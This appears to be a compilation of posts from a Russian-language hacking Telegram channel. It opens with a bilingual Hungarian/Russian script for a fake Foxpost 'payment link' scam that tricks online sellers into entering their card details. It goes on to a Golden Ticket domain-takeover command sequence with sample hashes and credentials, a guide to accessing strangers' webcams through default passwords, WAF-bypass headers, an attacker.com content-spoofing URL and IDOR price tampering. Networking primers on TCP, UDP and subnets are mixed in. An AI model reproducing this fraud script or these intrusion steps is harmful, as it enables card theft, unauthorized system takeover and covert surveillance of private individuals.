Даниил Тенигин

Венгрия шаблоны

2023-08-23T21:36:41.547Z

ОБЩЕНИЕ С МАМОНТОМ

Hello, érdekel a termék. Tudna küldeni nekem több képet?

Здравствуйте, меня интересует товар. Не могли бы вы прислать мне больше фотографий?

Oké, készen állok a vásárlásra.

Хорошо, я готов купить

A szállítást a Foxpost weboldalán tudom intézni. Mondja, ha elintézem és kifizetem az árut és a kiszállítást, kényelmes lenne, ha átadná az árut a futárnak? El fog jönni az otthonodba. A pénzt azonnal megkapja a bankszámlájára

Я могу оформить доставку на сайте Foxpost. Скажите, если я оформлю и оплачу товар и доставку, удобно ли Вам будет передать товар курьеру? Товар будет доставлен к вам домой. Вы получите деньги сразу же на свой банковский счет

Не знает как работает:

A Foxpost rendelkezik egy olyan funkcióval, amellyel a vevő a weboldalon keresztül fizethet a megrendelésért. A fizetés után kapok egy speciális linket, amelyet elküldök Önnek. Ezen a linken keresztül gyűjtheti be a pénzt az árukért. Ha nem vagy elfoglalt, akkor most is leadhatom a rendelést

+ СКРИН

В Foxpost есть функция, позволяющая покупателю оплатить заказ через сайт. После оплаты я получу специальную ссылку, которую отправлю вам. Собрать деньги за товар можно по этой ссылке. Если вы не заняты, могу сделать заказ прямо сейчас.

Сразу согласен:

Nagyszerű! Ha most nem vagy elfoglalt, akkor most elintézem a szállítást és kifizetem az árut. A weboldalon kapok egy speciális linket, amelyet elküldök neked. Ebben a linkben lesz utasítás arra vonatkozóan, hogyan lehet hozzájutni a pénzhez. Mindent egybevetve, majd meglátod magad

Замечательно! Если вы сейчас не заняты, я организую доставку и оплачу товар сейчас. На сайте я получу специальную ссылку, которую пришлю вам. По этой ссылке будут инструкции о том, как получить доступ к деньгам. В общем, вы сами увидите

Через 5-10 минут, если согл

Fizettem a szállításért és az áruért. A linkre kell kattintania, és megkapja a pénzt
Я оплатил доставку и товар. Вам нужно перейти по ссылке и получить деньги.

Теперь сразу:

A #(номер) rendelés sikeresen kifizetésre került a Foxpost!
Kérjük, továbbítsa a linket az eladónak. A biztonság kedvéért ne ossza meg a linket senki mással!
Link:
Köszönjük, hogy minket választott!
Foxpost ©2023.

Заказ №(номер) успешно оплачен Foxpost!

Пожалуйста, отправьте ссылку продавцу. В целях безопасности не делитесь ссылкой ни с кем! Ссылка: Спасибо, что выбрали нас!

ШАБЛОН ПОД ТП

Открыл ссылку:

Helló! Miben segíthetek?

Привет! Чем могу помочь?

Ввод ЛК:

Pénz fogadásához meg kell adnia kártyáját. Csak töltse ki az összes szükséges információt.

Для получения денег необходимо ввести данные своей карты. Просто заполните всю необходимую информацию.

Неверные данные:

Ön helytelenül adta meg a bankszámlaadatait. Kérjük, ellenőrizze, hogy helyesen adta-e meg az adatokat, és próbálja meg újra.

Вы неправильно ввели данные своего банковского счета. Пожалуйста, проверьте правильность ввода информации и повторите попытку.

Сомневаеться:

Megbízhat bennünk, mert mar sok éve működünk. Ez idő alattbb mint 100.000 szállítási tranzakciót bonyolítottunk le, és soha nem kaptunk negatív visszajelzést. Szolgalatunk együtt a rendőrseggel. Ha csalási kísérlet történik, azonnal továbbítjuk az adatokat a rendőrségnek. Nagyra értékeljük hírnevünket, és ügyfeleink biztonságát helyezzük előtérbe! Garantaljuk a 100% ban biztonságos tranzakciót. Mindössze annyit kell tennie, fill in the card details, hogy jutalék nélkül kapja meg a pénzt. Semilyen körülmenyek között nem adjuk át adatait harmadik félnek!

Нам можно доверять, ведь мы работаем уже много лет. За это время мы совершили более 100 000 операций по доставке и ни разу не получили отрицательных отзывов. Наша служба работает вместе с полицией. Если происходит попытка мошенничества, мы немедленно передаем данные в полицию. Мы дорожим своей репутацией и ставим безопасность наших клиентов на первое место! Мы гарантируем 100% безопасную транзакцию. Все, что вам нужно сделать, это заполнить данные карты, чтобы получить деньги без комиссии. Ни при каких обстоятельствах мы не передадим ваши данные третьим лицам!

Груповые адреса, подсеть

2023-07-31T12:56:31.021Z

Предыдущая статья - https://t.me/termuxqew/1220

Нашли ошибку? Диз. инфа? Пишите сюда - Тык

Груповые адреса

Если данные должны быть переданы на несколько устройств одновременно (например, просмотр видео с одной веб-камеры на различных компьютерах- или одновременное разворачивание образа операционной системы на несколько систем), то уменьшить нагрузку на сеть может использование групповых рассылок (IP Multicast Addressing).

вот такую схему смог вам сделать, простите что качество фигня

Для этого компьютеру присваивается еще один IР-адрес из специального диапазона: с 224.0.0.0 по 239.255.255.2551 , причем диапазоны 224.0.0.0-224.0.0.255 и 239.0.0.0-239.255.255.255 Multicast-aдpec присваивается динамически, Это делает соответствующая программа, использующая многоадресную рассылку. Назначение адресов групповой рассылки производится соответствующим программным обеспечением.

Про груповые адреса было взято с книги (https://t.me/c/1518819519/51)

Подсеть

Подсеть (Subnet) - это часть IP-сети, полученная путем разбиения сетевого адреса на более мелкие сегменты, что включает в себя множество хостов с одинаковым префиксом.

Маска адреса - это параметр, который сообщает программному обеспечению о том, сколько компьютеров объединено в ту или иную группу (подсеть)

На этой картинке ( тут представлено два сегмента справа и с лева)

Префикс — 192.168.18, 192.168.5

Номер устройства — _ _ _ тут

Маска подсети — 192.168.0.0/24

Заключение

Если вам нужна больше информации, спросите у автора статьи или ищите в интернете.

НАШ ТЕЛЕГРАМ КАНАЛ

Протоколы TCP и UDP.

2023-07-28T17:44:41.760Z

Привет! Хочу возобновить канал и поделиться интересными и познавательными материалами с вами. Не буду скрывать, что долго сомневался, о том, что же будет интересно и полезно для вас. Однако я пришел к решению начать с написания статей для новичков, в которых всё будет объяснено максимально доступно.

Буду использовать информацию из множества ресурсов, чтобы обеспечить достоверность и качество материалов. Надеюсь, это заинтересует вас, и вы найдете здесь много полезного.

Так что, не будем тянуть, начинаем! Буду рад вашей поддержке и отзывам. Спасибо, что остаетесь со мной!

Если нашли ошибку в статье, напишите @inspectiv!

Протокол TCP

TCP (Transmission Control Protocol) — один из основных протоколов передачи данных интернета, созданый в 1972 году. Основная концепция работы TCP - обеспечение надежной и устойчивой передачи данных между устройствами в сети, используя проверку целостности, установление соединения и автоматическое переотправление потерянных пакетов.

❗ Т.е: Передача предусматривает наличие подтверждений получения информации. Если передающая сторона не получит в установленные сроки необходимого подтверждения (SYN + ACK), то данные будут переданы повторно

Схема как работает TCP (three-way-handshake)

SYN — этот флаг используется для настройки соединения между хостами.
ACK — указывает, что поле «Подтверждение» имеет значение. Если ACK очищен до 0, это означает, что пакет не содержит подтверждения.

Если объяснить все просто:

Когда компьютер A хочет начать разговор с компьютером B (например, чтобы отправить данные), он сначала говорит "Привет, я хочу поговорить!" (как пожать руку для начала разговора). Он делает это, отправляя специальный сигнал, называемый "SYN".
Когда компьютер B получает сигнал "SYN" от компьютера A, он отвечает "Да, я слышу тебя, давай поговорим!" (как взаимное пожатие рук). Компьютер B отправляет обратно сигнал "SYN-ACK" (это означает "Я слышу тебя и готов общаться").
Когда компьютер A получает ответ "SYN-ACK" от компьютера B, он говорит "Отлично, давай начнем наш разговор!" (как ответное пожатие рук). Компьютер A отправляет сигнал "ACK" (подтверждение) обратно компьютеру B.

Протокол UDP

UDP (User Datagram Protocol) — также один из основных протоколов передачи данных интернета, созданый в 1980 году. Отличие: ❗ Передача данных по протоколу ТСР предусматривает наличие подтверждений получения информации, а по UDP - НЕТ

Без установления соединения: UDP не требует предварительного установления соединения между отправителем и получателем перед отправкой данных, что делает его более быстрым и менее надежным по сравнению с TCP.
Отправка пакетов без ожидания ответа: При отправке данных через UDP, отправитель просто отправляет пакеты в сеть, но не ждет ответа от получателя. Это делает UDP более быстрым, но оставляет возможность потери пакетов без оповещения отправителя.
Отсутствие гарантии доставки: UDP не обеспечивает механизмы проверки целостности и повторной отправки пакетов, что означает, что пакеты могут быть потеряны или доставлены в неправильном порядке без каких-либо попыток их восстановления.
Применение в определенных сценариях: UDP часто используется в сценариях, где небольшие задержки и быстрая передача данных важнее, чем точность доставки. Например, в потоковом видео, аудио-трансляциях, онлайн-играх и других приложениях, где актуальность данных превышает их абсолютную надежность.

Заключение

Если вам нужна больше информации, спросите у автора статьи или ищите в интернете. Для проверки вашего понимания, ответьте на вопрос в комментариях: "Как лучше сканировать порты: через TCP или UDP?" Аргументируйте свой ответ. Ответ будет представлен в следующей статье.

НАШ ТЕЛЕГРАМ КАНАЛ

Рецепт создания Golden Ticket'a

2023-04-22T20:45:16.010Z

Узнаем SID

sudo python3 lookupsid.py DOMAIN.local/user:passwd@DCIP

sudo python3 lookupsid.py MARVEL.local/pparker:meesh2eeE@192.168.63.137

У меня S-1-5-21-2456532762-888422967-2018005161

Учетка может быть любая, с малыми правами или без нету разницы.

2. Получим NTLM hash от krbtgt

Можете это сделать через mimikatz/DCSync/meterpreter

Мой хэш: 126aa2cf8f1ae103b0d3c0b2b3b5b2db

3. Генерируем тикет

python ticketer.py -nthash <krbtgt> -domain-sid <SID> -domain <DOMAIN.local> <ИМЯ_НОВОЙ_УЧЕТКИ>

python ticketer.py -nthash 126aa2cf8f1ae103b0d3c0b2b3b5b2db -domain-sid S-1-5-21-2456532762-888422967-2018005161 -domain MARVEL.local lol

export KRB5CCNAME=lol.ccache

4. Подключаемся

python3 psexec.py -dc-ip <DCIP> -target-ip <ИП_ЖЕРТВЫ_ПК> -no-pass -k ДОМЕН/НОВАЯ_УЧЕТКА@ИМЯ_КОМПА

python3 psexec.py -dc-ip 192.168.63.137 -target-ip 192.168.63.137 -no-pass -k MARVEL.local/lol@HYDRA-DC.MARVEL.local

Более детальная статья об этом - https://telegra.ph/Haker---Zakreplyaemsya-v-Active-Directory-Kak-sohranit-dostup-pri-atake-na-domen-07-26

Взлом web камер на простых примерах.

2022-04-22T06:55:19.280Z

ИСТОЧНИК => https://cryptoworld.su/vzlom-web-kamer-na-prostyx-primerax/

Для взлома камер нам понадобятся несколько программ:

KPortScan 3.0 (Скачать -> https://oxy.name/d/sUqf)
Yoba Parser (Скачать -> https://oxy.name/d/uUqf)
iVMS-4200 Client

Нам нужны IP диапазоны — для этого переходим на сайт 4it.me и выбираем IP диапазоны.

Вписываем нужный город:

Выделяем все IP адреса и идем в программу KPortScan.

Изменяем порт на 8000 и вставляем все IP адреса.

Нажимаем на кнопку «Start»:

После завершения проверки, открываем из папки с программой текстовик «results.txt».

И копируем все IP адреса.

Открываем папку с программой Yoba Parser.

Из папки с программой открываем текстовик ip.txt — и вставляем сюда все наши IP.

Запускаем программу — Она без интерфейса, так что просто нужно подождать, пока она закроется:

После завершения программы открываем текстовый документ «out.txt» и видим наши результаты! Поздравляю!

IP адресс камеры — (1)

Логин от камеры — (2)

Пароль от камеры — (3)

Запускаем программу iVMS-4200

Нажимаем Device Management

Нажимаем кнопку «Add»

В поле «Nickname» — вводим любое называние

В поле «Adress» -вводим IP адрес камеры

В поле «Login» — вводим Логин камеры (admin)

В поле «Password» — вводим Папроль камеры (12345)

И нажимаем кнопку «Add»:

Вверху нажимаем Control Panel и переходим в Main View.

В панели «Camera» у вас появится камера. Дважды нажимаете по ней, и вы будете просматривать данную камеру!

Также вам могут оставить послание как на скриншоте.

TOP 10 Burp Suite Plugins

2022-04-06T19:27:55.864Z

ИСТОЧНИК => https://protey.net/threads/top-10-burp-suite-plugins.278/

Функционала Burp Suite Professional, по умолчанию, может показаться достаточно, но если есть вариант что-то улучшить, то нужно этим пользоваться.

Как раз таким вариантом, в нашем случае будут плагины, ниже я сформировал топ 10 полезных расширений, которыми я пользуюсь в повседневности.

Upload Scanner

Веб-приложения, позволяющие пользователям загружать свои собственные файлы, являются классическим поводом для беспокойства при тестировании на проникновение. Если пользователям разрешено загружать файлы рискованным способом, существует множество методов это использовать. Это также означает, что для оценки функций загрузки файлов может потребоваться некоторое время - время, которое большинство пентестеров не тратит впустую.

Upload Scanner - это инструмент для тестирования, который может сэкономить вам много времени. Он имеет возможность загружать файлы разных типов, с различными формами полезной нагрузки. Upload Scanner может проверять наличие уязвимостей, включая подделку запросов на стороне сервера (SSRF) и внедрение внешнего объекта XML (XXE), используя в качестве векторов общие типы файлов, такие как JPEG, PDF и MP4.

Param Miner

Param Miner позволяет легко найти потенциальные векторы для атаки отравления веб-кэша. Он способен угадать до 65 000 имен параметров на запрос. И это было написано исследователем, который доказал, что отравление веб-кэша - это больше, чем просто теоретическая проблема.

ActiveScan ++

ActiveScan ++ - расширяет возможности активного и пассивного сканирования Burp Suite. Разработанный для добавления минимальных сетевых издержек, он определяет поведение приложения, которое может представлять интерес для опытных тестировщиков:

Потенциальные атаки на заголовок хоста (отравление сброса пароля, отравление кэша, перепривязка DNS)
Edge Side Include Injection
Обработка ввода XML
Подозрительное преобразование ввода (eg 7*7 => '49', \x41\x41 => 'AA')
Проблемы с пассивным сканером, возникающие только во время фаззинга (для максимальной эффективности установите расширение «Error Message Checks»)

Также добавлены проверки для следующих проблем:

Слепое внедрение кода через язык выражений, Ruby's open () и Perl's open ()
CVE-2014-6271/CVE-2014-6278 'Shellshock' и CVE-2015-2080, CVE-2017-5638, CVE-2017-12629, CVE-2018-11776

Он также предоставляет точки вставки для базовой аутентификации HTTP.

Чтобы вызвать эти проверки, просто запустите обычное активное сканирование.

Заголовок узла проверяет подделку заголовка узла, что может привести к тому, что запросы будут направлены в разные приложения на одном и том же узле. Соблюдайте осторожность при работе этого сканера с приложениями в среде общего хостинга.

Для этого расширения требуется автономная версия Burp Suite Professional версии 1.6 или новее и Jython 2.5 или новее.

Logger ++

Logger ++ - это многопоточное расширение для журналирования Burp Suite. В дополнение к регистрации запросов и ответов от всех инструментов Burp Suite, расширение позволяет определять расширенные фильтры, чтобы выделить интересные записи или журналы фильтра только для тех, которые соответствуют фильтру.

Встроенный инструмент grep позволяет искать в журналах, чтобы найти записи, которые соответствуют заданному шаблону, и извлечь значения групп захвата.

Чтобы разрешить использование журналов в других системах, таблицу также можно загрузить в Elasticsearch или экспортировать в CSV.

Software Vulnerability Scanner

Это расширение сканирует на наличие уязвимостей в обнаруженных версиях программного обеспечения с помощью API Vulners.com.

Он имеет две основные функции:

Обнаружение уязвимого программного обеспечения по отпечаткам или CPE.
Обнаружение возможных уязвимых путей, на присутствие публичных эксплойтов.

CO2

Это расширение содержит различные модули для улучшения возможностей Burp.

Расширение имеет собственную вкладку конфигурации с вложенными вкладками для каждого модуля Co2. Модули, которые взаимодействуют с другими инструментами Burp, можно отключить на вкладке конфигурации Co2, поэтому нет необходимости отключать все расширение при использовании только части функциональности.

O2 включает в себя следующие модули:

SQLMapper, помощник sqlmap. Просто щелкните правой кнопкой мыши по любому запросу в Burp, и вы увидите новую опцию меню для отправки запроса в SQLMapper. Появится экран SQLMapper, предварительно заполненный URL-адресом, данными POST (если применимо) и файлами cookie (если применимо) из запроса. Затем вы можете установить любые другие параметры, которые вам нужны, а затем скопировать / вставить команду в SQLMap в командной строке.
User Generator - для этого собраны общедоступные данные переписей с http://www.census.gov/genealogy/www/data/2000surnames/ (для фамилий) и популярные имена детей с веб-сайта социального обеспечения (http://www .ssa.gov/OACT/babynames /) для того, чтобы создать генератор имен пользователей на основе этих статистических данных. Интерфейс позволяет немного поработать с наборами данных, указать, хотите ли вы указать полные имена, инициалы, разделитель между именами и фамилиями и т. д. Инструмент определит, какие комбинации имен являются наиболее распространенными, и соответствующим образом отсортирует список. Набор результатов в настоящее время ограничен 200 000 имен, чтобы избежать проблем с производительностью.
Name Mangler - учитывая некоторые имена и домены, он будет манипулировать ими, создавая список потенциальных имен пользователей, которые можно отправить в Intruder для проверки входа в систему.
CeWLer - эта версия, основанная на сценарии командной строки Digininja CeWL для извлечения списка слов из файлов HTML, работает со списком ответов непосредственно внутри Burp.
Masher - Учитывая начальный список слов и спецификацию пароля, этот инструмент создаст нечеткий список возможных паролей. Masher начнет с объединения слов из предоставленного списка, затем добавит и заменит символы для создания новых паролей.
BasicAuther - учитывая список имен пользователей и список паролей, он покажет корректные строки BasicAuth, которые затем можно будет перетащить в Intruder.

WAFDetect

Это расширение пассивно обнаруживает присутствие брандмауэра веб-приложения (WAF) по ответам HTTP.

Bypass WAF

Это расширение добавляет заголовки ко всем запросам Burp, чтобы обойти некоторые продукты WAF. Следующие заголовки автоматически добавляются ко всем запросам:

Код:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

Применение:

Создайте правило обработки сеанса в Burp, которое вызывает это расширение.
Измените область, чтобы включить соответствующие инструменты и URL-адреса
Настройте параметры обхода на вкладке «Обход WAF»
Можно тестировать

Обход WAF содержит следующие функции:

Пользователи могут изменять заголовки X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr, отправленные в каждом запросе. Это, вероятно, лучший метод обхода инструмента. Нередко WAF настраивается на доверие к себе (127.0.0.1) или вышестоящему прокси-устройству, на что нацелен этот обход.
Заголовок «Content-Type» может оставаться неизменным в каждом запросе, удаляться из всех запросов или изменяться для одного из множества других параметров для каждого запроса. Некоторые WAF будут декодировать / оценивать запросы только на основе известных типов контента, эта функция нацелена на эту слабость.
Заголовок «Host» также может быть изменен. Плохо настроенные WAF могут быть настроены на оценку запросов только на основе правильного полного доменного имени хоста, указанного в этом заголовке, что и является целью обхода.
Опция типа запроса позволяет пользователю Burp использовать оставшиеся методы обхода только для данного метода запроса «GET» или «POST» или применять их ко всем запросам.
Функция внедрения пути может оставить запрос неизмененным, добавить информацию о случайном пути (/path/to/example.php/randomvalue?restofquery) или добавить параметр случайного пути (/path/to/example.php;randomparam=randomvalue? resetofquery). Это может использоваться, чтобы обойти плохо написанные правила, которые полагаются на информацию о пути.
Функция обфускации пути изменяет последнюю косую черту в пути на случайное значение или по умолчанию ничего не делает. Последняя косая черта может быть изменена на одно из многих значений, которое во многих случаях приводит к все еще действительному запросу, но может обойти плохо написанные правила WAF, которые полагаются на информацию о пути.
Функция обфускации параметров зависит от языка. PHP отбрасывает + в начале каждого параметра, но плохо написанное правило WAF может быть написано для конкретных имен параметров, таким образом игнорируя параметры с + в начале. Точно так же ASP сбрасывает% в начале каждого параметра.
Кнопка «Set Configuration» активирует все выбранные вами настройки.

Все эти функции могут быть объединены для обеспечения нескольких вариантов обхода.

Backslash powered scanner

Это расширение дополняет активный сканер Burp, используя новый подход, способный находить и подтверждать как известные, так и неизвестные классы уязвимостей внедрения на стороне сервера. Разработанный на основе классических ручных методов, этот подход использует многие преимущества ручного тестирования, включая случайное уклонение от WAF, незначительное использование сети и гибкость при фильтрации входных данных.

HTTP Request Smuggler

Это расширение для Burp Suite, разработанное, чтобы помочь вам запускать атаки HTTP Request Smuggling, первоначально созданные во время исследования HTTP Desync Attacks. Он поддерживает сканирование на наличие уязвимостей, связанных с Request Smuggling, а также помогает в эксплуатации, выполняя для вас громоздкую настройку смещения.

Это расширение не следует путать с Burp Suite HTTP Smuggler, который использует аналогичные методы, но сфокусирован исключительно на WAF.

Text Based Injection | Content Spoofing

2022-03-28T06:31:39.760Z

Внедрение на основе текста. Внедрение текста или внедрение на основе текста (TBI) — это внедрение, при котором пользовательский ввод отражается так же, как и в ответе приложения, в виде открытого текста. Это один из способов подмены контента, также называемый внедрением контента или виртуальным искажением, который можно использовать в фишинговых атаках.

Приложение уязвимо для внедрения текста, если оно неправильно обрабатывает предоставленные пользователем данные. Злоумышленник может предоставить контент веб-приложению, как правило, через значение параметра или только из URL-адреса, который отражается обратно пользователю. Пользователю будет представлена измененная страница в контексте доверенного домена.

Тип атаки: уязвимость на стороне клиента

Серьезность: низкая

Руководство по аудиту

Внедрение текста можно легко найти там, где

Ввод пользователя через параметр или непосредственно в URL отражается в ответе страницы..
Content-Type: текстовый/обычный
Приложение выдает страницы ошибок по умолчанию

Доказательство концепции

Если вы исследуете немного больше, чтобы понять, почему это происходит и в чем здесь проблема. Вы получите ответ на вопрос «в чем проблема», что приложение выдает страницу ошибки по умолчанию.

На вопрос «почему это происходит» мы знаем ответ, верно?

В любом случае, ответ, вводимый пользователем через параметр или непосредственно в URL-адресе, отражается в ответе страницы.

Страница ошибки

URL - https://example.com/captcha

Страница ошибки

Изменена страница ошибки

URL-адрес: https://example.com/captcha/SS%2F%20%20%20is%20not%20available.%20Please%20visit%20-%20-%20-%20-%20https://attacker.com %20%20-%20-%20-%20-%20ас%20ресурс%20

Изменена страница ошибки

Как это делает Google

Google очень хорошо обрабатывает страницы ошибок. Вот скриншот для справки.

Хорошая обработка пользовательского ввода в URL-адресе Google

Влияние

Злоумышленник может использовать уязвимость внедрения текста, чтобы представить настроенное сообщение в приложении, которое может заставить пользователей поверить в подлинность сообщения. Намерение типично для жертв, хотя иногда фактическая цель может заключаться в том, чтобы просто представить в ложном свете организацию или человека. Эта атака обычно используется как социальная инженерия или в сочетании с ней, поскольку атака использует уязвимость в коде и доверие пользователя. В качестве примечания, эта атака широко ошибочно понимается как своего рода ошибка, которая не оказывает никакого влияния.

CSRF poc generator и burp collaborator бесплатно

2022-03-19T18:10:07.630Z

Если вы бедный, как и админ канала t.me/termuxqew, но хотите разблокирорвать две платные функции в burp suite, то я вам покажу как это сделать! =)

CSRF poc generator

Сперва разблокируем CSRF poc generator. (github.com/merttasci/csrf-poc-generator)

Для этого скачиваем с гитхаба архив и извлекаем

После переходим через cmd в папку с репо и пишем

python - m http.server

Если на линукс, то проще будет написать

php -S localhost:порт

После переходим на localhost:8000 и видим утилиту!

После этого просто используем по назначению

Профит! ;)

burp collaborator

Есть еще одна полезная штука, это - burp collaborator. Если рассматривать, то burp collaborator - это утилита, какая показывает, послал ли запрос сервер, или нет. Необходима когда на сайте тип уязвимости blind. Можем использовать request bin. http://requestbin.net/ просо создаем новый requestbin и посылаем запрос командой

curl -X POST -d "fizz=buzz" http://requestbin.net/r/<тутваше>

Если понравилась эта статья, пишите в комментариях. Могу потом написать про бурп еще что-то подобное. Всем хороших хаков!

Idor на пальцах

2022-03-10T14:45:13.722Z

НАШ КАНАЛ => https://t.me/termuxqew

Согласно определению OWASP, «небезопасные прямые ссылки на объекты возникают, когда приложение предоставляет прямой доступ к объектам на основе введенных пользователем данных. В результате этой уязвимости злоумышленники могут обойти авторизацию и получить прямой доступ к ресурсам в системе, например к записям базы данных или файлам» 1

Уязвимости IDOR (Insecure Direct Object references) - связанные с авторизацией, которые обычно приводят к раскрытию и потере конфиденциальной информации, если она существует в системе. Атака IDOR — одна из самых простых для объяснения.

Пример:

Давайте рассмотрим следующий URL-адрес: http://idorexample.com/profile?userID=100 , который возвращает

Student Name: Liisa
Student Email: liisa@email.com
CGPA: 4.2
Address: Abcdef, 123

А теперь представьте, просто изменив идентификатор пользователя на 101: http://idorexample.com/profile?userID=101

Student Name: Artur
Student Email: artur@email.com
CGPA: 4.7
Address: Abcdef, 123

Если система отображает результат без надлежащей проверки авторизации, то это небезопасные прямые ссылки на объекты. Это самый простой пример. Это наиболее распространенная уязвимость, которую обычно упускают из виду, поскольку шаблон параметра отличается от веб-приложения к веб-приложению. С другой стороны, автоматические инструменты сканирования недостаточно умны, чтобы найти эту уязвимость. Это связано с тем, что проверки безопасности недостаточно интеллектуальны, чтобы знать, являюсь ли я законным пользователем или нет, пока я не использую вредоносную полезную нагрузку.

Влияние IDOR

Последствия IDOR не ограничиваются потерей конфиденциальной информации. Посмотрите на следующее условие.

http://idor.example.com/changePassword?userID=100

http://idor.example.com/deleteAccount?userID=101

На этот раз мы можем представить, что уязвимость IDOR также приводит к потере данных и захвату учетной записи.

Где существует IDOR

IDOR существует во многих местах, однако наиболее распространенными являются следующие:
1. GET-запрос
2. Страница входа
3. POST-запрос
4. Изменить пароль
5. API-запрос

IDOR на практике

У нас есть веб страница, на какой можем купить билеты.

Цена одного билета составляет 15 Евро. Что-то дорого, давайте используем уязвимость idor и закажем 1 билет за 1 евро:

Перехватываем запрос через Burp:

2. Меняем значение ticket_price на цену (в моем случае 1) и отправляем запрос:

3. Наслаждаемся ценой в 1 Евро :)

Это был самый простой пример, на деле все будет сложнее

Дополнительные сведения см. на следующих страницах https://www.gracefulsecurity.com/idor-insecure-direct-object-reference/ https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)

Foca - лучший инструмент для пассивного фаззинга

2022-03-04T11:47:22.280Z

FOCA — это инструмент, используемый главным образом для поиска метаданных и скрытой информации в сканируемых документах . Эти документы могут быть размещены на веб-страницах и могут быть загружены и проанализированы с помощью FOCA.

Он способен анализировать широкий спектр документов, наиболее распространенными из которых являются файлы Microsoft Office , Open Office или PDF , хотя он также анализирует, например, файлы Adobe InDesign или SVG.

Эти документы ищутся с использованием трех возможных поисковых систем: Google , Bing и DuckDuckGo . Сумма результатов трех двигателей составляет множество документов. Также можно добавить локальные файлы для извлечения информации EXIF из графических файлов, а полный анализ информации, обнаруженной через URL, проводится еще до загрузки файла.

Проще говоря мы можем собрать документы и их метданные из заданного нами сайта.

Главный плюс программы заключаеться в том, что она может собирать метаданные из собраных документов.

Более подробный мануал => CLICK

Наш телеграм канал => CLICK

Ссылка на Foca => Click

Даниил Тенигин

Венгрия шаблоны

ОБЩЕНИЕ С МАМОНТОМ

Не знает как работает:

Сразу согласен:

Через 5-10 минут, если согл

ШАБЛОН ПОД ТП

Открыл ссылку:

Ввод ЛК:

Неверные данные:

Сомневаеться:

Груповые адреса, подсеть

Груповые адреса

Подсеть

Заключение

НАШ ТЕЛЕГРАМ КАНАЛ

Протоколы TCP и UDP.

Протокол TCP

Протокол UDP

Заключение

НАШ ТЕЛЕГРАМ КАНАЛ

Рецепт создания Golden Ticket'a

Взлом web камер на простых примерах.

Для взлома камер нам понадобятся несколько программ:

TOP 10 Burp Suite Plugins

Text Based Injection | Content Spoofing

Руководство по аудиту

Доказательство концепции

Влияние

Рекомендации

CSRF poc generator и burp collaborator бесплатно

CSRF poc generator

burp collaborator

Idor на пальцах

НАШ КАНАЛ => https://t.me/termuxqew

Пример:

Влияние IDOR

Где существует IDOR

IDOR на практике

Foca - лучший инструмент для пассивного фаззинга